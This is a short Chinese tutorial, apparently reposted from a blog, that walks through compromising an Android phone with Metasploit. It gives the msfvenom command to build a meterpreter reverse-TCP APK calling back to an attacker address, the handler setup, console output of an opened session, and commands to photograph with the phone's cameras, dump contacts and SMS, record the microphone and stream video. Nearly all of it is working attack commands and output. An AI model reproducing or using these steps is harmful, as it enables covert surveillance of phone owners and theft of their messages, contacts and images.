MSF初体验—入侵安卓手机

1.生成apk程序

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk

2.启动msfconsole

3.启动use exploit/multi/handler模块

4.set payload android/meterpreter/reverse_tcp

5.show options 

6.准备工作

msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit(运行apk程序)

[*] Started reverse TCP handler on 192.168.1.101:5555
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.101:5555 -> 192.168.1.105:57629) at 2017-06-27 22:25:09 +0800

7.查看手机信息sysinfo

8.查看摄像头

meterpreter > webcam_list
1: Back Camera
2: Front Camera

9.启动摄像头拍照

webcam_snap -i 1

webcam_snap -i 2

dump_contacts    --》这个是导出电话

dump_sms                 --》这个是导出信息

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

成功解决

原文地址:https://www.cnblogs.com/chenjingyi/p/7087498.html